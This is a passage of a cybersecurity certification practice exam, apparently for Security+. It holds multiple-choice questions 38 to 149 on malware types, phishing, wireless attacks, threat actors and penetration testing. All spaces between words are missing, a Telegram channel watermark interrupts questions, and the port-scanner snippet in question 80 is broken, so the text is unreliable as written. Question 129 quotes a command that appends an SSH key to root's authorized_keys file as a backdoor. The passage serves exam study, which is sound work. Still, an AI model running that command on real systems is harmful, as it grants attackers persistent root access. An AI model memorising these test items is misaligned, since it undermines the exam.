B. DDoS
C. Botnet
Telegram Channel @nettrain
D. Backdoor
38. WhyisSSLstrippingaparticulardangerwithopenWi-Finetworks?
A. WPA2isnotsecureenoughtopreventthis.
B. Openhotspotsdonotasserttheiridentityinasecureway.
C. Openhotspotscanbeaccessedbyanyuser.
D. 802.11acisinsecureandtrafficcanberedirected.
39. Asalesmanageratyourcompanyiscomplainingaboutslowperformanceonhiscomputer.Whenyouthoroughlyinvestigatetheissue,youfindspywareonhiscomputer.Heinsiststhattheonlythinghehasdownloadedrecentlywasafreewarestocktradingapplication.Whatwouldbestexplainthissituation?
A. Logicbomb
B. Trojanhorse
C. Rootkit
D. Macrovirus
40. Whenphishingattacksaresofocusedthattheytargetaspecifichigh-rankingorimportantindividual,theyarecalledwhat?
A. Spearphishing
B. Targetedphishing
C. Phishing
D. Whaling
41. Whattypeofthreatactorsaremostlikelytohaveaprofitmotivefortheirmaliciousactivities?
A. Stateactors
B. Scriptkiddies
C. Hacktivists
D. Criminalsyndicates
42. Oneofyouruserscannotrecallthepasswordfortheirlaptop.Youwanttorecoverthatpasswordforthem.Youintendtouseatool/techniquethatispopularwithhackers,anditconsistsofsearchingtablesofprecomputed
Telegram Channel @nettrain
hashestorecoverthepassword.Whatbestdescribesthis?
A. Rainbowtable
B. Backdoor
C. Socialengineering
D. Dictionaryattack
43. Whatriskiscommonlyassociatedwithalackofvendorsupportforaproduct,suchasanoutdatedversionofadevice?
A. Improperdatastorage
B. Lackofpatchesorupdates
C. Lackofavailabledocumentation
D. Systemintegrationandconfigurationissues
44. Youhavenoticedthatwheninacrowdedarea,yousometimesgetastreamofunwantedtextmessages.Themessagesendwhenyouleavethearea.Whatdescribesthisattack?
A. Bluejacking
B. Bluesnarfing
C. Eviltwin
D. Rogueaccesspoint
45. Dennisusesanon-pathattacktocauseasystemtosendHTTPStraffictohissystemandthenforwardsittotheactualserverthetrafficisintendedfor.Whattypeofpasswordattackcanheconductwiththedatahegathersifhecapturesallthetrafficfromaloginform?
A. Aplain-textpasswordattack
B. Apass-the-hashattack
C. ASQLinjectionattack
D. Across-sitescriptingattack
46. Someonehasbeenrummagingthroughyourcompany'strashbinsseekingtofinddocuments,diagrams,orothersensitiveinformationthathasbeenthrownout.Whatisthiscalled?
A. Dumpsterdiving
Telegram Channel @nettrain
B. Trashdiving
C. Socialengineering
D. Trashengineering
47. Louisisinvestigatingamalwareincidentononeofthecomputersonhisnetwork.Hehasdiscoveredunknownsoftwarethatseemstobeopeningaport,allowingsomeonetoremotelyconnecttothecomputer.Thissoftwareseemstohavebeeninstalledatthesametimeasasmallsharewareapplication.Whichofthefollowingbestdescribesthismalware?
A. RAT
B. Worm
C. Logicbomb
D. Rootkit
48. Jaredisresponsiblefornetworksecurityathiscompany.Hehasdiscoveredbehaviorononecomputerthatcertainlyappearstobeavirus.Hehasevenidentifiedafilehethinksmightbethevirus.However,usingthreeseparateantivirusprograms,hefindsthatnonecandetectthefile.Whichofthefollowingismostlikelytobeoccurring?
A. ThecomputerhasaRAT.
B. Thecomputerhasazero-dayexploit.
C. Thecomputerhasaworm.
D. Thecomputerhasarootkit.
49. WhichofthefollowingisnotacommonmeansofattackingRFIDbadges?
A. Datacapture
B. Spoofing
C. Denial-of-service
D. Birthdayattacks
50. Yourwirelessnetworkhasbeenbreached.Itappearstheattackermodifiedaportionofdatausedwiththestreamcipherandusedthistoexposewirelesslyencrypteddata.Whatisthisattackcalled?
A. Eviltwin
Telegram Channel @nettrain
B. RogueWAP
C. IVattack
D. WPSattack
51. ThecompanythatScottworksforhasexperiencedadatabreach,andthepersonalinformationofthousandsofcustomershasbeenexposed.Whichofthefollowingimpactcategoriesisnotaconcernasdescribedinthisscenario?
A. Financial
B. Reputation
C. Availabilityloss
D. Dataloss
52. Whattypeofattackexploitsthetrustthatawebsitehasforanauthenticatedusertoattackthatwebsitebyspoofingrequestsfromthetrusteduser?
A. Cross-sitescripting
B. Cross-siterequestforgery
C. Bluejacking
D. Eviltwin
53. Whatpurposedoesafusioncenterserveincyberintelligenceactivities?
A. Itpromotesinformationsharingbetweenagenciesororganizations.
B. Itcombinessecuritytechnologiestocreatenew,morepowerfultools.
C. Itgeneratespowerforthelocalcommunityinasecureway.
D. Itseparatesinformationbyclassificationratingstoavoidaccidentaldistribution.
54. CVEisanexampleofwhattypeoffeed?
A. Athreatintelligencefeed
B. Avulnerabilityfeed
C. Acriticalinfrastructurelistingfeed
D. Acriticalvirtualizationexploitsfeed
55. Whattypeofattackisabirthdayattack?
Telegram Channel @nettrain
A. Asocialengineeringattack
B. Acryptographicattack
C. Anetworkdenial-of-serviceattack
D. ATCP/IPprotocolattack
56. JuanitaisanetworkadministratorforAcmeCompany.Someuserscomplainthattheykeepgettingdroppedfromthenetwork.WhenJuanitachecksthelogsforthewirelessaccesspoint(WAP),shefindsthatadeauthenticationpackethasbeensenttotheWAPfromtheusers'IPaddresses.Whatseemstobehappeninghere?
A. Problemwithusers'Wi-Ficonfiguration
B. Disassociationattack
C. Sessionhijacking
D. Backdoorattack
57. Johnhasdiscoveredthatanattackeristryingtogetnetworkpasswordsbyusingsoftwarethatattemptsanumberofpasswordsfromalistofcommonpasswords.Whattypeofattackisthis?
A. Dictionary
B. Rainbowtable
C. Bruteforce
D. Sessionhijacking
58. Youareanetworksecurityadministratorforabank.YoudiscoverthatanattackerhasexploitedaflawinOpenSSLandforcedsomeconnectionstomovetoaweakciphersuiteversionofTLS,whichtheattackercouldbreach.Whattypeofattackwasthis?
A. Disassociationattack
B. Downgradeattack
C. Sessionhijacking
D. Bruteforce
59. Whenanattackertriestofindaninputvaluethatwillproducethesamehashasapassword,whattypeofattackisthis?
Telegram Channel @nettrain
A. Rainbowtable
B. Bruteforce
C. Sessionhijacking
D. Collisionattack
60. Farèsisthenetworksecurityadministratorforacompanythatcreatesadvancedroutersandswitches.Hehasdiscoveredthathiscompany'snetworkshavebeensubjectedtoaseriesofadvancedattacksoveraperiodoftime.Whatbestdescribesthisattack?
A. DDoS
B. Bruteforce
C. APT
D. Disassociationattack
61. Whattypeofinformationisphishingnotcommonlyintendedtoacquire?
A. Passwords
B. Emailaddresses
C. Creditcardnumbers
D. Personalinformation
62. JohnisrunninganIDSonhisnetwork.UserssometimesreportthattheIDSflagslegitimatetrafficasanattack.Whatdescribesthis?
A. Falsepositive
B. Falsenegative
C. Falsetrigger
D. Falseflag
63. Scottdiscoversthatmalwarehasbeeninstalledononeofthesystemsheisresponsiblefor.Shortlyafterwardpasswordsusedbytheuserthatthesystemisassignedtoarediscoveredtobeinusebyattackers.WhattypeofmaliciousprogramshouldScottlookforonthecompromisedsystem?
A. Arootkit
B. Akeylogger
Telegram Channel @nettrain
C. Aworm
D. Noneoftheabove
64. Youareperformingapenetrationtestofyourcompany'snetwork.Aspartofthetest,youwillbegivenaloginwithminimalaccessandwillattempttogainadministrativeaccesswiththisaccount.Whatisthiscalled?
A. Privilegeescalation
B. Sessionhijacking
C. Rootgrabbing
D. Climbing
65. MattdiscoversthatasystemonhisnetworkissendinghundredsofEthernetframestotheswitchitisconnectedto,witheachframecontainingadifferentsourceMACaddress.Whattypeofattackhashediscovered?
A. Etherspam
B. MACflooding
C. Hardwarespoofing
D. MAChashing
66. Spywareisanexampleofwhattypeofmalware?
A. Trojan
B. PUP
C. RAT
D. Ransomware
67. Maryhasdiscoveredthatawebapplicationusedbyhercompanydoesnotalwayshandlemultithreadingproperly,particularlywhenmultiplethreadsaccessthesamevariable.Thiscouldallowanattackerwhodiscoveredthisvulnerabilitytoexploititandcrashtheserver.WhattypeoferrorhasMarydiscovered?
A. Bufferoverflow
B. Logicbomb
C. Raceconditions
D. Impropererrorhandling
Telegram Channel @nettrain
68. Anattackeristryingtogetaccesstoyournetwork.Heissendingusersonyournetworkalinktoanewgamewithahackedlicensecodeprogram.However,thegamefilesalsoincludesoftwarethatwillgivetheattackeraccesstoanymachinethatitisinstalledon.Whattypeofattackisthis?
A. Rootkit
B. Trojanhorse
C. Spyware
D. Bootsectorvirus
69. ThefollowingimageshowsareportfromanOpenVASsystem.Whattypeofweakconfigurationisshownhere?
A. Weakencryption
B. Unsecuredadministrativeaccounts
C. Openportsandservices
D. Unsecureprotocols
70. Whileconductingapenetrationtest,Anniescansforsystemsonthenetworkshehasgainedaccessto.Shediscoversanothersystemwithinthesamenetworkthathasthesameaccountsandusertypesastheonesheison.Sinceshealreadyhasavaliduseraccountonthesystemshehasalreadyaccessed,sheisabletologintoit.Whattypeoftechniqueisthis?
Telegram Channel @nettrain
A. Lateralmovement
B. Privilegeescalation
C. Privilegeretention
D. Verticalmovement
71. AmandascansaRedHatLinuxserverthatshebelievesisfullypatchedanddiscoversthattheApacheversionontheserverisreportedasvulnerabletoanexploitfromafewmonthsago.Whenshecheckstoseeifsheismissingpatches,Apacheisfullypatched.Whathasoccurred?
A. Afalsepositive
B. Anautomaticupdatefailure
C. Afalsenegative
D. AnApacheversionmismatch
72. Whenaprogramhasvariables,especiallyarrays,anddoesnotchecktheboundaryvaluesbeforeinputtingdata,whatattackistheprogramvulnerableto?
A. XSS
B. CSRF
C. Bufferoverflow
D. Logicbomb
73. Tracyisconcernedthatthesoftwareshewantstodownloadmaynotbetrustworthy,soshesearchesforitandfindsmanypostingsclaimingthatthesoftwareislegitimate.Ifsheinstallsthesoftwareandlaterdiscoversitismaliciousandthatmaliciousactorshaveplantedthosereviews,whatprincipleofsocialengineeringhavetheyused?
A. Scarcity
B. Familiarity
C. Consensus
D. Trust
74. Whichofthefollowingbestdescribesmalwarethatwillexecutesomemaliciousactivitywhenaparticularconditionismet(i.e.,iftheconditionis
Telegram Channel @nettrain
met,thenexecuted)?
A. Bootsectorvirus
B. Logicbomb
C. Bufferoverflow
D. Sparseinfectorvirus
75. Whattermdescribesusingconversationaltacticsaspartofasocialengineeringexercisetoextractinformationfromtargets?
A. Pretexting
B. Elicitation
C. Impersonation
D. Intimidation
76. Telnet,RSH,andFTPareallexamplesofwhat?
A. Filetransferprotocols
B. Unsecureprotocols
C. Coreprotocols
D. Openports
77. Scottwantstodeterminewhereanorganization'swirelessnetworkcanbeaccessedfrom.Whattestingtechniquesarehismostlikelyoptions?
A. OSINTandactivescans
B. Wardrivingandwarflying
C. Socialengineeringandactivescans
D. OSINTandwardriving
78. Geraldisanetworkadministratorforasmallfinancialservicescompany.Usersarereportingoddbehaviorthatappearstobecausedbyavirusontheirmachines.Afterisolatingthemachinesthathebelievesareinfected,Geraldanalyzesthem.Hefindsthatalltheinfectedmachinesreceivedanemailpurportingtobefromaccounting,withanExcelspreadsheet,andtheusersopenedthespreadsheet.Whatisthemostlikelyissueonthesemachines?
A. Amacrovirus
Telegram Channel @nettrain
B. Abootsectorvirus
C. ATrojanhorse
D. ARAT
79. Yourcompanyhashiredanoutsidesecurityfirmtoperformvarioustestsofyournetwork.Duringthevulnerabilityscan,youwillprovidethatcompanywithloginsforvarioussystems(i.e.,databaseserver,applicationserver,webserver,etc.)toaidintheirscan.Whatbestdescribesthis?
A. Aknownenvironmenttest
B. Agray-boxtest
C. Acredentialedscan
D. Anintrusivescan
80. Stevediscoversthefollowingcodeonasystem.Whatlanguageisitwrittenin,andwhatdoesitdo?
importsocketasskt
forportinrange(1,9999):
try:
sc=skt.socket(askt.AF_INET,skt.SOCK_STREAM)
sc.settimeout(900)
sc.connect(('127.0.0.1,port))
print'%d:OPEN'%(port)
sc.close
except:continue
A. Perl,vulnerabilityscanning
B. Python,portscanning
C. Bash,vulnerabilityscanning
D. PowerShell,portscanning
81. Whichofthefollowingiscommonlyusedinadistributeddenial-of-service(DDoS)attack?
A. Phishing
B. Adware
C. Botnet
Telegram Channel @nettrain
D. Trojan
82. Amandadiscoversthatamemberofherorganization'sstaffhasinstalledaremoteaccessTrojanontheiraccountingsoftwareserverandhasbeenaccessingitremotely.Whattypeofthreathasshediscovered?
A. Zero-day
B. Insiderthreat
C. Misconfiguration
D. Weakencryption
83. PostingsfromRussianagentsduringthe2016U.S.presidentialcampaigntoFacebookandTwitterareanexampleofwhattypeofeffort?
A. Impersonation
B. Asocialmediainfluencecampaign
C. Asymmetricwarfare
D. Awateringholeattack
84. Juanisresponsibleforincidentresponseatalargefinancialinstitution.HediscoversthatthecompanyWi-Fihasbeenbreached.Theattackerusedthesamelogincredentialsthatshipwiththewirelessaccesspoint(WAP).TheattackerwasabletousethosecredentialstoaccesstheWAPadministrativeconsoleandmakechanges.Whichofthefollowingbestdescribeswhatcausedthisvulnerabilitytoexist?
A. Improperlyconfiguredaccounts
B. Untrainedusers
C. Usingdefaultsettings
D. Failuretopatchsystems
85. Elizabethisinvestigatinganetworkbreachathercompany.Shediscoversaprogramthatwasabletoexecutecodewithintheaddressspaceofanotherprocessbyusingthetargetprocesstoloadaspecificlibrary.Whatbestdescribesthisattack?
A. Logicbomb
B. Sessionhijacking
Telegram Channel @nettrain
C. Bufferoverflow
D. DLLinjection
86. Whichofthefollowingthreatactorsismostlikelytobeassociatedwithanadvancedpersistentthreat(APT)?
A. Hacktivists
B. Stateactors
C. Scriptkiddies
D. Insiderthreats
87. Whatistheprimarydifferencebetweenanintrusiveandanonintrusivevulnerabilityscan?
A. Anintrusivescanisapenetrationtest.
B. Anonintrusivescanisjustadocumentcheck.
C. Anintrusivescancouldpotentiallydisruptoperations.
D. Anonintrusivescanwon'tfindmostvulnerabilities.
88. Yourcompanyoutsourceddevelopmentofanaccountingapplicationtoalocalprogrammingfirm.Afterthreemonthsofusingtheproduct,oneofyouradministratorsdiscoversthatthedevelopershaveinsertedawaytologinandbypassallsecurityandauthentication.Whatbestdescribesthis?
A. Logicbomb
B. Trojanhorse
C. Backdoor
D. Rootkit
89. Darylisinvestigatingarecentbreachofhiscompany'swebserver.Theattackerusedsophisticatedtechniquesandthendefacedthewebsite,leavingmessagesthatweredenouncingthecompany'spublicpolicies.Heandhisteamaretryingtodeterminethetypeofactorwhomostlikelycommittedthebreach.Basedontheinformationprovided,whowasthemostlikelythreatactor?
A. Ascript
B. Anation-state
Telegram Channel @nettrain
C. Organizedcrime
D. Hacktivists
90. Whattwotechniquesaremostcommonlyassociatedwithapharmingattack?
A. ModifyingthehostsfileonaPCorexploitingaDNSvulnerabilityonatrustedDNSserver
B. Phishingmanyusersandharvestingemailaddressesfromthem
C. Phishingmanyusersandharvestingmanypasswordsfromthem
D. SpoofingDNSserverIPaddressesormodifyingthehostsfileonaPC
91. Angelareviewstheauthenticationlogsforherwebsiteandseesattemptsfrommanydifferentaccountsusingthesamesetofpasswords.Whatisthisattacktechniquecalled?
A. Bruteforcing
B. Passwordspraying
C. Limitedloginattacks
D. Accountspinning
92. Wheninvestigatingbreachesandattemptingtoattributethemtospecificthreatactors,whichofthefollowingisnotoneoftheindicatorsofanAPT?
A. Long-termaccesstothetarget
B. Sophisticatedattacks
C. TheattackcomesfromaforeignIPaddress.
D. Theattackissustainedovertime.
93. Charlesdiscoversthatanattackerhasusedavulnerabilityinawebapplicationthathiscompanyrunsandhasthenusedthatexploittoobtainrootprivilegesonthewebserver.Whattypeofattackhashediscovered?
A. Cross-sitescripting
B. Privilegeescalation
C. ASQLinjection
D. Aracecondition
Telegram Channel @nettrain
94. Whattypeofattackusesasecondwirelessaccesspoint(WAP)thatbroadcaststhesameSSIDasalegitimateaccesspoint,inanattempttogetuserstoconnecttotheattacker'sWAP?
A. Eviltwin
B. IPspoofing
C. Trojanhorse
D. Privilegeescalation
95. Whichofthefollowingbestdescribesazero-dayvulnerability?
A. Avulnerabilitythatthevendorisnotyetawareof
B. Avulnerabilitythathasnotyetbeenbreached
C. Avulnerabilitythatcanbequicklyexploited(i.e.,inzerodays)
D. Avulnerabilitythatwillgivetheattackerbriefaccess(i.e.,zerodays)
96. Whattypeofattackinvolvesaddinganexpressionorphrasesuchasadding“SAFE”tomailheaders?
A. Pretexting
B. Phishing
C. SQLinjection
D. Prepending
97. Charleswantstoensurethathisoutsourcedcodedevelopmenteffortsareassecureaspossible.Whichofthefollowingisnotacommonpracticetoensuresecureremotecodedevelopment?
A. Ensuredevelopersaretrainedonsecurecodingtechniques.
B. Setdefinedacceptancecriteriaforcodesecurity.
C. Testcodeusingautomatedandmanualsecuritytestingsystems.
D. Auditallunderlyinglibrariesusedinthecode.
98. Youhavediscoveredthatthereareentriesinyournetwork'sdomainnameserverthatpointlegitimatedomainstounknownandpotentiallyharmfulIPaddresses.Whatbestdescribesthistypeofattack?
A. Abackdoor
Telegram Channel @nettrain
B. AnAPT
C. DNSpoisoning
D. ATrojanhorse
99. Spywareisanexampleofwhattypeofmalicioussoftware?
A. ACAT
B. Aworm
C. APUP
D. ATrojan
100. Whatbestdescribesanattackthatattachessomemalwaretoalegitimateprogramsothatwhentheuserinstallsthelegitimateprogram,theyinadvertentlyinstallthemalware?
A. Backdoor
B. Trojanhorse
C. RAT
D. Polymorphicvirus
101. Whichofthefollowingbestdescribessoftwarethatwillprovidetheattackerwithremoteaccesstothevictim'smachinebutthatiswrappedwithalegitimateprograminanattempttotrickthevictimintoinstallingit?
A. RAT
B. Backdoor
C. Trojanhorse
D. Macrovirus
102. Whatprocesstypicallyoccursbeforecardcloningattacksoccur?
A. Abrute-forceattack
B. Askimmingattack
C. Arainbowtableattack
D. Abirthdayattack
103. Whichofthefollowingisanattackthatseekstoattackawebsite,basedonthewebsite'strustofanauthenticateduser?
Telegram Channel @nettrain
A. XSS
B. XSRF
C. Bufferoverflow
D. RAT
104. Valerieisresponsibleforsecuritytestingapplicationsinhercompany.Shehasdiscoveredthatawebapplication,undercertainconditions,cangenerateamemoryleak.Whattypeofattackwouldthisleavetheapplicationvulnerableto?
A. DoS
B. Backdoor
C. SQLinjection
D. Bufferoverflow
105. ThemobilegamethatJackhasspentthelastyeardevelopinghasbeenreleased,andmaliciousactorsaresendingtraffictotheserverthatrunsittopreventitfromcompetingwithothergamesintheAppStore.Whattypeofdenial-of-serviceattackisthis?
A. AnetworkDDoS
B. AnoperationaltechnologyDDoS
C. AGDoS
D. AnapplicationDDoS
106. Charleshasbeentaskedwithbuildingateamthatcombinestechniquesfromattackersanddefenderstohelpprotecthisorganization.Whattypeofteamishebuilding?
A. Aredteam
B. Ablueteam
C. Awhiteteam
D. Apurpleteam
107. Mikeisanetworkadministratorwithasmallfinancialservicescompany.Hehasreceivedapop-upwindowthatstateshisfilesarenowencryptedandhemustpay.5bitcoinstogetthemdecrypted.Hetriestocheckthe
Telegram Channel @nettrain
filesinquestion,buttheirextensionshavechanged,andhecannotopenthem.Whatbestdescribesthissituation?
A. Mike'smachinehasarootkit.
B. Mike'smachinehasransomware.
C. Mike'smachinehasalogicbomb.
D. Mike'smachinehasbeenthetargetofwhaling.
108. Whenamultithreadedapplicationdoesnotproperlyhandlevariousthreadsaccessingacommonvalue,andonethreadcanchangethedatawhileanotherthreadisrelyingonit,whatflawisthis?
A. Memoryleak
B. Bufferoverflow
C. Integeroverflow
D. Timeofcheck/timeofuse
109. AcmeCompanyisusingsmartcardsthatusenear-fieldcommunication(NFC)ratherthanneedingtobeswiped.Thisismeanttomakephysicalaccesstosecureareasmoresecure.Whatvulnerabilitymightthisalsocreate?
A. Tailgating
B. Eavesdropping
C. IPspoofing
D. Raceconditions
110. RickbelievesthatWindowssystemsinhisorganizationarebeingtargetedbyfilelessviruses.Ifhewantstocaptureartifactsoftheirinfectionprocess,whichofthefollowingoptionsismostlikelytoprovidehimwithaviewintowhattheyaredoing?
A. Reviewingfull-diskimagesofinfectedmachines
B. TurningonPowerShelllogging
C. Disablingtheadministrativeuseraccount
D. AnalyzingWindowscrashdumpfiles
111. Johnisresponsibleforphysicalsecurityatalargemanufacturingplant.
Telegram Channel @nettrain
Employeesalluseasmartcardinordertoopenthefrontdoorandenterthefacility.Whichofthefollowingisacommonwayattackerswouldcircumventthissystem?
A. Phishing
B. Tailgating
C. Spoofingthesmartcard
D. RFIDspoofing
112. AdamwantstodownloadlistsofmaliciousoruntrustworthyIPaddressesanddomainsusingSTIXandTAXII.Whattypeofserviceishelookingfor?
A. Avulnerabilityfeed
B. Athreatfeed
C. Ahuntingfeed
D. Arulefeed
113. Duringanincidentinvestigation,Naominoticesthatasecondkeyboardwaspluggedintoasysteminapublicareaofhercompany'sbuilding.Shortlyafterthatevent,thesystemwasinfectedwithmalware,resultinginadatabreach.WhatshouldNaomilookforinherin-personinvestigation?
A. ATrojanhorsedownload
B. AmaliciousUSBcableordrive
C. Aworm
D. Noneoftheabove
114. YouareresponsibleforincidentresponseatAcmeCorporation.YouhavediscoveredthatsomeonehasbeenabletocircumventtheWindowsauthenticationprocessforaspecificnetworkapplication.Itappearsthattheattackertookthestoredhashofthepasswordandsentitdirectlytothebackendauthenticationservice,bypassingtheapplication.Whattypeofattackisthis?
A. Hashspoofing
B. Eviltwin
C. Shimming
Telegram Channel @nettrain
D. Passthehash
115. Auserinyourcompanyreportsthatshereceivedacallfromsomeoneclaimingtobefromthecompanytechnicalsupportteam.Thecallerstatedthattherewasavirusspreadingthroughthecompanyandtheyneededimmediateaccesstotheemployee'scomputertostopitfrombeinginfected.Whatsocial-engineeringprinciplesdidthecallerusetotrytotricktheemployee?
A. Urgencyandintimidation
B. Urgencyandauthority
C. Authorityandtrust
D. Intimidationandauthority
116. Afterrunningavulnerabilityscan,ElainediscoversthattheWindows10workstationsinhercompany'swarehousearevulnerabletomultipleknownWindowsexploits.Whatshouldsheidentifyastherootcauseinherreporttomanagement?
A. Unsupportedoperatingsystems
B. Improperorweakpatchmanagementfortheoperatingsystems
C. Improperorweakpatchmanagementforthefirmwareofthesystems
D. Useofunsecureprotocols
117. AhmedhasdiscoveredthatattackersspoofedIPaddressestocausethemtoresolvetoadifferenthardwareaddress.Themanipulationhaschangedthetablesmaintainedbythedefaultgatewayforthelocalnetwork,causingdatadestinedforonespecificMACaddresstonowberoutedelsewhere.Whattypeofattackisthis?
A. ARPpoisoning
B. DNSpoisoning
C. On-pathattack
D. Backdoor
118. Whattypeofpenetrationtestisbeingdonewhenthetesterisgivenextensiveknowledgeofthetargetnetwork?
A. Knownenvironment
Telegram Channel @nettrain
B. Fulldisclosure
C. Unknownenvironment
D. Redteam
119. Yourcompanyisinstitutinganewsecurityawarenessprogram.Youareresponsibleforeducatingendusersonavarietyofthreats,includingsocialengineering.Whichofthefollowingbestdefinessocialengineering?
A. Illegalcopyingofsoftware
B. Gatheringinformationfromdiscardedmanualsandprintouts
C. Usingpeopleskillstoobtainproprietaryinformation
D. Phishingemails
120. Whichofthefollowingattackscanbecausedbyauserbeingunawareoftheirphysicalsurroundings?
A. ARPpoisoning
B. Phishing
C. Shouldersurfing
D. Smurfattack
121. Whatarethetwomostcommongoalsofinvoicescams?
A. Receivingmoneyoracquiringcredentials
B. Acquiringcredentialsordeliveringarootkit
C. Receivingmoneyorstealingcryptocurrency
D. Acquiringcredentialsordeliveringransomware
122. Whichofthefollowingtypeoftestingusesanautomatedprocessofproactivelyidentifyingvulnerabilitiesofthecomputingsystemspresentonanetwork?
A. Securityaudit
B. Vulnerabilityscanning
C. Aknownenvironmenttest
D. Anunknownenvironmenttest
123. Johnhasbeenaskedtodoapenetrationtestofacompany.Hehasbeen
Telegram Channel @nettrain
givengeneralinformationbutnodetailsaboutthenetwork.Whatkindoftestisthis?
A. Partiallyknownenvironment
B. Knownenvironment
C. Unknownenvironment
D. Masked
124. Underwhichtypeofattackdoesanattacker'ssystemappeartobetheservertotherealclientandappeartobetheclienttotherealserver?
A. Denial-of-service
B. Replay
C. Eavesdropping
D. On-path
125. YouareasecurityadministratorforAcmeCorporation.Youhavediscoveredmalwareonsomeofyourcompany'smachines.Thismalwareseemstointerceptcallsfromthewebbrowsertolibraries,andthenmanipulatesthebrowsercalls.Whattypeofattackisthis?
A. Maninthebrowser
B. On-pathattack
C. Bufferoverflow
D. Sessionhijacking
126. Tonyisreviewingawebapplicationanddiscoversthewebsitegenerateslinkslikethefollowing:
https://www.example.com/login.html?
Relay=http%3A%2F%2Fexample.com%2Fsite.html
Whattypeofvulnerabilityisthiscodemostlikelytobesusceptibleto?
A. SQLinjection
B. URLredirection
C. DNSpoisoning
D. LDAPinjection
Telegram Channel @nettrain
127. YouareresponsibleforsoftwaretestingatAcmeCorporation.Youwanttocheckallsoftwareforbugsthatmightbeusedbyanattackertogainentranceintothesoftwareoryournetwork.Youhavediscoveredawebapplicationthatwouldallowausertoattempttoputa64-bitvalueintoa4-byteintegervariable.Whatisthistypeofflaw?
A. Memoryoverflow
B. Bufferoverflow
C. Variableoverflow
D. Integeroverflow
128. AngelahasdiscoveredanattackagainstsomeoftheusersofherwebsitethatleverageURLparametersandcookiestomakelegitimateusersperformunwantedactions.Whattypeofattackhasshemostlikelydiscovered?
A. SQLinjection
B. Cross-siterequestforgery
C. LDAPinjection
D. Cross-sitescripting
129. Nathandiscoversthefollowingcodeinthedirectoryofacompromiseduser.Whatlanguageisitusing,andwhatwillitdo?
echo"ssh-rsaABBAB4KAE9sdafAK…Mq/jc5YLfnAnbFDRABMhuWzaWUp
root@localhost">>/root/.ssh/authorized_keys
A. Python,addsanauthorizedSSHkey
B. Bash,connectstoanothersystemusinganSSHkey
C. Python,connectstoanothersystemusinganSSHkey
D. Bash,addsanauthorizedSSHkey
130. Jaredhasdiscoveredmalwareontheworkstationsofseveralusers.Thisparticularmalwareprovidesadministrativeprivilegesfortheworkstationtoanexternalhacker.Whatbestdescribesthismalware?
A. Trojanhorse
B. Logicbomb
C. Multipartitevirus
Telegram Channel @nettrain
D. Rootkit
131. Whyarememoryleaksapotentialsecurityissue?
A. Theycanexposesensitivedata.
B. Theycanallowattackerstoinjectcodeviatheleak.
C. Theycancausecrashes
D. Noneoftheabove
132. MichellediscoversthatanumberofsystemsthroughoutherorganizationareconnectingtoachangingsetofremotesystemsonTCPport6667.Whatisthemostlikelycauseofthis,ifshebelievesthetrafficisnotlegitimate?
A. Analternateserviceportforwebtraffic
B. BotnetcommandandcontrolviaIRC
C. Downloadsviaapeer-to-peernetwork
D. RemoteaccessTrojans
133. Susanperformsavulnerabilityscanofasmallbusinessnetworkanddiscoversthattheorganization'sconsumer-gradewirelessrouterhasavulnerabilityinitswebserver.Whatissueshouldsheaddressinherfindings?
A. Firmwarepatchmanagement
B. Defaultconfigurationissues
C. Anunsecuredadministrativeaccount
D. Weakencryptionsettings
134. WhereisanRFIDattackmostlikelytooccuraspartofapenetrationtest?
A. Systemauthentication
B. Accessbadges
C. Webapplicationaccess
D. VPNlogins
135. Whattypeofphishingattackoccursviatextmessages?
A. Bluejacking
B. Smishing
Telegram Channel @nettrain
C. Phonejacking
D. Textwhaling
136. Usersinyourcompanyreportsomeonehasbeencallingtheirextensionandclaimingtobedoingasurveyforalargevendor.Basedonthequestionsaskedinthesurvey,yoususpectthatthisisascamtoelicitinformationfromyourcompany'semployees.Whatbestdescribesthis?
A. Spearphishing
B. Vishing
C. Wardialing
D. Robocalling
137. Johnisanalyzingarecentmalwareinfectiononhiscompanynetwork.Hediscoversmalwarethatcanspreadrapidlyviavulnerablenetworkservicesanddoesnotrequireanyinteractionfromtheuser.Whatbestdescribesthismalware?
A. Worm
B. Virus
C. Logicbomb
D. Trojanhorse
138. Yourcompanyhasissuedsomenewsecuritydirectives.Oneofthesenewdirectivesisthatalldocumentsmustbeshreddedbeforebeingthrownout.Whattypeofattackisthistryingtoprevent?
A. Phishing
B. Dumpsterdiving
C. Shouldersurfing
D. On-pathattack
139. Whichofthefollowingisnotacommonpartofacleanupprocessafterapenetrationtest?
A. Removingallexecutablesandscriptsfromthecompromisedsystem
B. Restoringallrootkitstotheiroriginalsettingsonthesystem
C. Returningallsystemsettingsandapplicationconfigurationstotheir
Telegram Channel @nettrain
originalconfigurations
D. Removinganyuseraccountscreatedduringthepenetrationtest
140. Youhavediscoveredthatsomeonehasbeentryingtologontoyourwebserver.Thepersonhastriedawiderangeoflikelypasswords.Whattypeofattackisthis?
A. Rainbowtable
B. Birthdayattack
C. Dictionaryattack
D. Spoofing
141. Jimdiscoversaphysicaldeviceattachedtoagaspump'screditcardreader.Whattypeofattackhashelikelydiscovered?
A. Areplayattack
B. Aracecondition
C. Askimmer
D. Acardcloner
142. Whatistheprimarydifferencebetweenactiveandpassivereconnaissance?
A. Activewillbedonemanually,passivewithtools.
B. Activeisdonewithblack-boxtestsandpassivewithwhite-boxtests.
C. Activeisusuallydonebyattackersandpassivebytesters.
D. Activewillactuallyconnecttothenetworkandcouldbedetected;passivewon't.
143. Abrowsertoolbarisanexampleofwhattypeofmalware?
A. Arootkit
B. ARAT
C. Aworm
D. APUP
144. Whattermdescribesdatathatiscollectedfrompubliclyavailablesourcesthatcanbeusedinanintelligencecontext?
A. OPSEC
Telegram Channel @nettrain
B. OSINT
C. IntCon
D. STIX
145. Whattypeofattacktargetsaspecificgroupofusersbyinfectingoneormorewebsitesthatthatgroupisspecificallyknowntovisitfrequently?
A. Awatercoolerattack
B. Aphishingnetattack
C. Awateringholeattack
D. Aphishpondattack
146. TracyisconcernedaboutLDAPinjectionattacksagainstherdirectoryserver.WhichofthefollowingisnotacommontechniquetopreventLDAPinjectionattacks?
A. SecureconfigurationofLDAP
B. Userinputvalidation
C. LDAPqueryparameterization
D. Outputfilteringrules
147. FredusesaTorproxytobrowseforsitesaspartofhisthreatintelligence.WhattermisfrequentlyusedtodescribethispartoftheInternet?
A. Throughthelookingglass
B. Thedarkweb
C. Theunderweb
D. Onion-space
148. WhatbrowserfeatureisusedtohelppreventsuccessfulURLredirectionattacks?
A. Certificateexpirationtracking
B. DisplayingthefullrealURL
C. Disablingcookies
D. EnablingJavaScript
149. Whatisthemostsignificantdifferencebetweencloudservice-basedand
Telegram Channel @nettrain
on-premisesvulnerabilities?
A. Yourabilitytoremediateityourself
